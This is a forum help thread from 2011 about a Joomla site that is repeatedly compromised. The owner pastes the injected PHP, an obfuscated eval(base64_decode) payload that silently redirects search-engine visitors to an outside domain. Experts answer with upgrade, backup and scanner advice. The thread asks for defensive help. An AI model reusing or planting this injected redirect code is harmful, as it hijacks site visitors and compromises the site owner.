?
Solved

Joomla Exploit

Posted on 2011-09-21
7
Medium Priority
?
1,022 Views
Last Modified: 2012-05-12
We are being attacked weekly with the same code.

Added to the changelog, configuration, credits, license, index php files is the code (after the <?php>

I remove the code when i see the files have been modified which seems to be weekly... but they return.  

The code added is attached.

I know a resolution would be to upgrade to 1.7 Joomla but am hoping to find a more expedient and less costly for my client.
<?php	                                       	eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));

Open in new window

0
Comment
Question by:bborner
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
7 Comments
 
LVL 13

Accepted Solution

by:
Andrew Derse earned 1000 total points
ID: 36576543
Well for starters you should at least upgrade to Joomla 1.5.23.  Joomla 1.5.6 is much less secure than that.

Please let me know if you need help in finding the upgrade files.

Also, please check into RS Firewall, it does cost a little bit of $$, but it WILL help you in your fight against the hackers.

Main goal though is to get upgraded to 1.5.23 first.
0
 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36576559
Here's a link for RS Firewall:
http://www.rsjoomla.com/joomla-extensions/joomla-security.html

And a link for the 1.5.23 upgrade from your version:
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5848

*Also make sure you backup your website on a regular basis.  Akeeba Backup will assist with that.
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/1606

Please let me know if you need any additional help.
0
 

Author Comment

by:bborner
ID: 36577975
Great advice ... will take it one step at a time starting with akeeba.
Will get back to you with progress.
Thanks
0
Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 13

Expert Comment

by:Andrew Derse
ID: 36579533
Sounds good.
0
 
LVL 15

Expert Comment

by:Russell_Venable
ID: 36581860
Can't tell you what there using as the code you posted got edited by the moderators, it seems atleast.
0
 
LVL 15

Assisted Solution

by:Russell_Venable
Russell_Venable earned 1000 total points
ID: 36582192
You can scan your website using the joomla vulnerability scanner which is made by yehs, which is a ethical hacker group dedicated in finding and patching these vulnerability's. So credentials are valid and trustable.

You can download it from owsap or there own site both links are on this page. https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project

Atleat this will give you a idea of what fixes you need to look out for ad what php file is giving the problem.


0
 
LVL 14

Expert Comment

by:Allan Nisbet
ID: 36585995
Yeah the code seems edited so i cant see where they are attacking

Feel free to email me the code via the contact form on our profile site

Should be fairly easy to block this, we had one similar through com_properties that looks like a similar exploit

also get Admin Tools as it adds lots of features to the site for security protection

Storm
0

Featured Post

Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This story has been written with permission from the scammed victim, a valued client of mine – identity protected by request.
If you're not part of the solution, you're part of the problem.   Tips on how to secure IoT devices, even the dumbest ones, so they can't be used as part of a DDoS botnet.  Use PRTG Network Monitor as one of the building blocks, to detect unusual…
In this brief tutorial Pawel from AdRem Software explains how you can quickly find out which services are running on your network, or what are the IP addresses of servers responsible for each service. Software used is freeware NetCrunch Tools (https…
This is my first video review of Microsoft Bookings, I will be doing a part two with a bit more information, but wanted to get this out to you folks.
Suggested Courses
Course of the Month10 days, 2 hours left to enroll

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question